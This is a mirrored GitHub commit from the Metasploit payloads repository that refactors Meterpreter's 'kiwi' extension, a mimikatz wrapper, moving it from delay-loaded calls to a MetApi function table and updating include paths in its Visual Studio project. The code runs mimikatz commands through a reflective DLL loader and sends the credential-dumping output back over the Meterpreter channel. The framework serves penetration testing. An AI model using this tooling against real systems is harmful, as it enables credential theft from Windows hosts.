github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00
Code Releases Activity

Remove delay loading from the kiwi extension

Browse Source
This commit is contained in:
OJ 2020-04-17 19:58:05 +10:00
parent f4f6bb01d8
commit 4cd3a29319
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
2 changed files with 19 additions and 16 deletions
c/meterpreter
source/extensions/kiwi
main.c
workspace/ext_server_kiwi
ext_server_kiwi.vcxproj

27
c/meterpreter/source/extensions/kiwi/main.c

@ -3,15 +3,17 @@
* @brief Entry point for the kiwi extension. * @brief Entry point for the kiwi extension.
*/ */
#include "../../DelayLoadMetSrv/DelayLoadMetSrv.h" #include "common.h"
#include "common_metapi.h"
// Required so that use of the API works.
MetApi* met_api = NULL;
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function // include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the // but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions. // second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
#include "main.h" #include "main.h"
extern __declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPWSTR input); extern __declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPWSTR input);
@ -37,9 +39,9 @@ Command customCommands[] =
DWORD request_exec_cmd(Remote *remote, Packet *packet) DWORD request_exec_cmd(Remote *remote, Packet *packet)
{ {
DWORD result = ERROR_SUCCESS; DWORD result = ERROR_SUCCESS;
Packet * response = packet_create_response(packet); Packet * response = met_api->packet.create_response(packet);
wchar_t* cmd = packet_get_tlv_value_wstring(packet, TLV_TYPE_KIWI_CMD); wchar_t* cmd = met_api->packet.get_tlv_value_wstring(packet, TLV_TYPE_KIWI_CMD);
if (cmd != NULL) if (cmd != NULL)
{ {
dprintf("[KIWI] Executing command: %S", cmd); dprintf("[KIWI] Executing command: %S", cmd);
@ -49,7 +51,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
wchar_t* output = powershell_reflective_mimikatz(cmd); wchar_t* output = powershell_reflective_mimikatz(cmd);
if (output != NULL) if (output != NULL)
{ {
packet_add_tlv_wstring(response, TLV_TYPE_KIWI_CMD_RESULT, output); met_api->packet.add_tlv_wstring(response, TLV_TYPE_KIWI_CMD_RESULT, output);
} }
else else
{ {
@ -63,7 +65,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
} }
dprintf("[KIWI] Dumped, transmitting response."); dprintf("[KIWI] Dumped, transmitting response.");
packet_transmit_response(result, remote, response); met_api->packet.transmit_response(result, remote, response);
dprintf("[KIWI] Done."); dprintf("[KIWI] Done.");
return ERROR_SUCCESS; return ERROR_SUCCESS;
@ -71,18 +73,19 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet)
/*! /*!
* @brief Initialize the server extension. * @brief Initialize the server extension.
* @param api Pointer to the Meterpreter API structure.
* @param remote Pointer to the remote instance. * @param remote Pointer to the remote instance.
* @return Indication of success or failure. * @return Indication of success or failure.
*/ */
DWORD __declspec(dllexport) InitServerExtension(Remote *remote) DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote* remote)
{ {
hMetSrv = remote->met_srv; met_api = api;
dprintf("[KIWI] Init server extension - initorclean"); dprintf("[KIWI] Init server extension - initorclean");
mimikatz_initOrClean(TRUE); mimikatz_initOrClean(TRUE);
dprintf("[KIWI] Init server extension - register"); dprintf("[KIWI] Init server extension - register");
command_register_all(customCommands); met_api->command.register_all(customCommands);
dprintf("[KIWI] Init server extension - done"); dprintf("[KIWI] Init server extension - done");
@ -97,7 +100,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote) DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{ {
mimikatz_initOrClean(FALSE); mimikatz_initOrClean(FALSE);
command_deregister_all(customCommands); met_api->command.deregister_all(customCommands);
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }

8
c/meterpreter/workspace/ext_server_kiwi/ext_server_kiwi.vcxproj

@ -105,7 +105,7 @@
<ClCompile> <ClCompile>
<Optimization>MinSpace</Optimization> <Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -157,7 +157,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile> <ClCompile>
<Optimization>MinSpace</Optimization> <Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -212,7 +212,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile> <ClCompile>
<Optimization>MinSpace</Optimization> <Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -268,7 +268,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile> <ClCompile>
<Optimization>MinSpace</Optimization> <Optimization>MinSpace</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions> <IntrinsicFunctions>true</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>_POWERKATZ;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_KIWI_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling> <StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary> <RuntimeLibrary>MultiThreaded</RuntimeLibrary>